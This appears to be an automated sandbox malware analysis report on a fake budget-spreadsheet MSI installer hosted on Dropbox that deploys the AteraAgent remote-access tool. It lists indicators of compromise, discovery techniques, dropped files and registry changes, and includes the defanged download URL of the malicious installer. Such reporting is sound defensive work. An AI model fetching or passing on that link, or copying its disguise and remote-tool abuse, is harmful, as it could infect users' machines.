ateraagent | hxxps://www[.]dropbox[.]com/scl/fi/zgxfzes4y09jcfjax2jd9/PlanilhaOrcamentoPDF[.]msi?rlkey=ijhrpa833envr6inh6gd8nsqb&st=h7ecvuvj&dl=1

Analysis

max time kernel
103s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 19:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.dropbox.com/scl/fi/zgxfzes4y09jcfjax2jd9/PlanilhaOrcamentoPDF.msi?rlkey=ijhrpa833envr6inh6gd8nsqb&st=h7ecvuvj&dl=1

Score

10^/10

ateraagent discovery rat

Malware Config

Signatures

AteraAgent
AteraAgent is a remote monitoring and management tool.
rat ateraagent
Ateraagent family
ateraagent

Detects AteraAgent 1 IoCs

Processes:

resource	yara_rule
behavioral1/files/0x0006000000022f73-38.dat	family_ateraagent

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow	pid	Process
61	5892	rundll32.exe
66	5948	rundll32.exe

Executes dropped EXE 6 IoCs

Processes:

AteraAgent.exeAteraAgent.exeAgentPackageAgentInformation.exeAteraAgent.exeAteraAgent.exeAgentPackageAgentInformation.exe

pid	Process
4196	AteraAgent.exe
5884	AteraAgent.exe
3248	AgentPackageAgentInformation.exe
4520	AteraAgent.exe
4908	AteraAgent.exe
948	AgentPackageAgentInformation.exe

Loads dropped DLL 34 IoCs

Processes:

MsiExec.exerundll32.exerundll32.exerundll32.exeMsiExec.exerundll32.exeMsiExec.exeMsiExec.exe

pid	Process
5668	MsiExec.exe
5728	rundll32.exe
5728	rundll32.exe
5728	rundll32.exe
5728	rundll32.exe
5728	rundll32.exe
5668	MsiExec.exe
5892	rundll32.exe
5892	rundll32.exe
5892	rundll32.exe
5892	rundll32.exe
5892	rundll32.exe
5892	rundll32.exe
5892	rundll32.exe
5668	MsiExec.exe
6104	rundll32.exe
6104	rundll32.exe
6104	rundll32.exe
6104	rundll32.exe
6104	rundll32.exe
5668	MsiExec.exe
5260	MsiExec.exe
5260	MsiExec.exe
5668	MsiExec.exe
5948	rundll32.exe
5948	rundll32.exe
5948	rundll32.exe
5948	rundll32.exe
5948	rundll32.exe
5948	rundll32.exe
5948	rundll32.exe
2472	MsiExec.exe
2636	MsiExec.exe
2636	MsiExec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exemsiexec.exe

description	ioc	Process
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe

Drops file in System32 directory 15 IoCs

Processes:

AteraAgent.exeAteraAgent.exeAgentPackageAgentInformation.exeAteraAgent.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	AteraAgent.exe
File opened for modification	C:\Windows\system32\InstallUtil.InstallLog	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	AteraAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log	AgentPackageAgentInformation.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4	AteraAgent.exe
File opened for modification	C:\Windows\system32\InstallUtil.InstallLog	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944	AteraAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	AteraAgent.exe

Drops file in Program Files directory 21 IoCs

Processes:

msiexec.exeAteraAgent.exeAteraAgent.exeAteraAgent.exeAteraAgent.exe

description	ioc	Process
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll	msiexec.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallState	AteraAgent.exe
File opened for modification	C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll	msiexec.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dll	msiexec.exe
File opened for modification	C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt	AteraAgent.exe
File opened for modification	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll	AteraAgent.exe
File opened for modification	C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	msiexec.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll	msiexec.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation.zip	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe.config	AteraAgent.exe
File opened for modification	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog	AteraAgent.exe
File opened for modification	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallState	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll	msiexec.exe
File opened for modification	C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini	AteraAgent.exe
File created	C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll	AteraAgent.exe

Drops file in Windows directory 39 IoCs

Processes:

msiexec.exerundll32.exerundll32.exerundll32.exerundll32.exe

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSI44FA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI44FA.tmp-\System.Management.dll	rundll32.exe
File created	C:\Windows\Installer\e58314c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI31E8.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3564.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3564.tmp-\Newtonsoft.Json.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3564.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3BD1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF205.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3564.tmp-\System.Management.dll	rundll32.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3A08.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3BA1.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIFCB6.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI31E8.tmp-\Newtonsoft.Json.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3564.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3A08.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File created	C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3B90.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3A08.tmp-\System.Management.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3A08.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI44FA.tmp-\AlphaControlAgentInstallation.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI44FA.tmp-\Microsoft.Deployment.WindowsInstaller.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI31E8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI31E8.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3A08.tmp-\Newtonsoft.Json.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI44FA.tmp-\CustomAction.config	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIF204.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI31E8.tmp-\AlphaControlAgentInstallation.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3564.tmp-\AlphaControlAgentInstallation.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3A08.tmp-\AlphaControlAgentInstallation.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSI3C4F.tmp	msiexec.exe
File created	C:\Windows\Installer\e58314e.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI44FA.tmp-\Newtonsoft.Json.dll	rundll32.exe
File opened for modification	C:\Windows\Installer\MSIF274.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e58314c.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI31E8.tmp-\System.Management.dll	rundll32.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exe

pid	Process
5876	sc.exe
5772	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

rundll32.exerundll32.exerundll32.exeMsiExec.exeTaskKill.exenet1.exeNET.exenet1.exeMsiExec.exeMsiExec.exerundll32.exeMsiExec.exeNET.exeTaskKill.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TaskKill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NET.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TaskKill.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e3c1c56297b3270b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e3c1c5620000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e3c1c562000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de3c1c562000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e3c1c56200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 2 IoCs

evasion

Processes:

TaskKill.exeTaskKill.exe

pid	Process
3856	TaskKill.exe
5248	TaskKill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

AteraAgent.exeAteraAgent.exemsiexec.exeAteraAgent.exeAteraAgent.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	AteraAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	AteraAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	AteraAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	AteraAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	AteraAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c1400000001000000140000006837e0ebb63bf85f1186fbfe617b088865f44e42040000000100000010000000d91299e84355cd8d5a86795a0118b6e90f000000010000003000000065b1d4076a89ae273f57e6eeedecb3eae129b4168f76fa7671914cdf461d542255c59d9b85b916ae0ca6fc0fcf7a8e64190000000100000010000000a344f71a7a52a76ee49b74b1d8816b155c000000010000000400000000100000180000000100000010000000ffac207997bb2cfe865570179ee037b94b0000000100000044000000430038004500350033003400450045003100320039004600320037004400350035003400360030004300450031003700460044003600320038003200310036005f0000002000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	AteraAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	AteraAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	AteraAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	AteraAgent.exe
